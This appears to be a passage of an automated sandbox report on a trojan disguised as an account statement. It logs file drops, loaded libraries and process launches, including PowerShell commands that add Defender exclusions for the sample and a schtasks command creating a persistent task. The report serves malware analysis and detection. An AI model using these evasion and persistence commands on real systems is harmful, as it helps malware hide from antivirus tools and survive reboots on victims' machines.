                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.raw.unpack, aMIWm.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.raw.unpack, 3QjbQ514BDx.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.raw.unpack, 3QjbQ514BDx.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, o8FNF2SyvOrIjq11mH.cs | Security API names: _0020.SetAccessControl
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, o8FNF2SyvOrIjq11mH.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, o8FNF2SyvOrIjq11mH.cs | Security API names: _0020.AddAccessRule
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, o8FNF2SyvOrIjq11mH.cs | Security API names: _0020.SetAccessControl
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, o8FNF2SyvOrIjq11mH.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, o8FNF2SyvOrIjq11mH.cs | Security API names: _0020.AddAccessRule
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, xKKRJ8VTFX4G1N1xGX.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.8930000.7.raw.unpack, xKKRJ8VTFX4G1N1xGX.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4fbeaf8.1.raw.unpack, xKKRJ8VTFX4G1N1xGX.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, o8FNF2SyvOrIjq11mH.cs | Security API names: _0020.SetAccessControl
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, o8FNF2SyvOrIjq11mH.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.4f1b6d8.0.raw.unpack, o8FNF2SyvOrIjq11mH.cs | Security API names: _0020.AddAccessRule
                    Source: classification engine | Classification label: mal100.spre.troj.spyw.evad.winEXE@19/15@2/2
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | File created: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Mutant created: NULL
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe | Mutant created: \Sessions\1\BaseNamedObjects\jHHFqVAHBkOyEUsNGAVZyWFA
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:64:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5328:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3564:120:WilError_03
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | File created: C:\Users\user\AppData\Local\Temp\tmpC678.tmp
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exe | ReversingLabs: Detection: 36%
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exe | String found in binary or memory: Save/Load
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | File read: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe:Zone.Identifier
                    Source: unknown | Process created: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe"
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpC678.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                    Source: unknown | Process created: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpD609.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe"
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe"
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpC678.tmp"
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpD609.tmp"
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Section loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Section loaded: version.dll
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Section loaded: windowscodecs.dll
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Section loaded: amsi.dll
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Section loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Section loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Section loaded: urlmon.dll
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Section loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Section loaded: srvcli.dll
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Section loaded: propsys.dll
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Section loaded: edputil.dll
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Section loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Section loaded: wintypes.dll
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Section loaded: appresolver.dll
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Section loaded: bcp47langs.dll
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Section loaded: slc.dll
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Section loaded: sppc.dll
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Section loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Section loaded: ntmarta.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                    Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: vaultcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe Section loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe Section loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe Section loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe Section loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe Section loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe Section loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe Section loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe Section loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe Section loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe Section loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe Section loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe Section loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe Section loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe Section loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe Section loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe Section loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe Section loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe Section loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe Section loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
